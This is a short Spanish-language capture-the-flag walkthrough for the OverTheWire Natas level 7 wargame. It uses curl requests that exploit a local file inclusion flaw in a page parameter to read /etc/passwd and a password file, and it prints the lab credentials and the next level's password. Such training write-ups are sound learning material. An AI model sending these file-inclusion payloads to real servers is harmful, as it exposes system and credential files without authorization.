OverTheWire - Natas 6 - 7 (sin navegador)

August 2022

Información

Las contraseñas cambian cada cierto tiempo, existe la posibilidad de que esta contraseña ya no sea válida

Username: natas7
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
URL:      http://natas7.natas.labs.overthewire.org

Solución

Primero ejecutamos el comando curl con el parámetro -u para indicar las credenciales.

curl -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 http://natas7.natas.labs.overthewire.org/

Observamos 2 links y un hint que nos indica donde se ubica la contraseña de natas8 en el servidor.

Si vamos a los links no vemos nada interesante.

Si sustituimos el valor about por el valor del archivo /etc/passwd confirmamos que index.php es vulnerable a LFI.

curl -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 'http://natas7.natas.labs.overthewire.org/index.php?page=/etc/passwd'

Si ahora escribimos la ruta absoluta hacia la contraseña de natas8 /etc/natas_webpass/natas8 obtenemos la contraseña.

curl -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 'http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8'

Contraseña

DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Anterior

Siguiente

Powered by Soopr   •  Theme  Moonwalk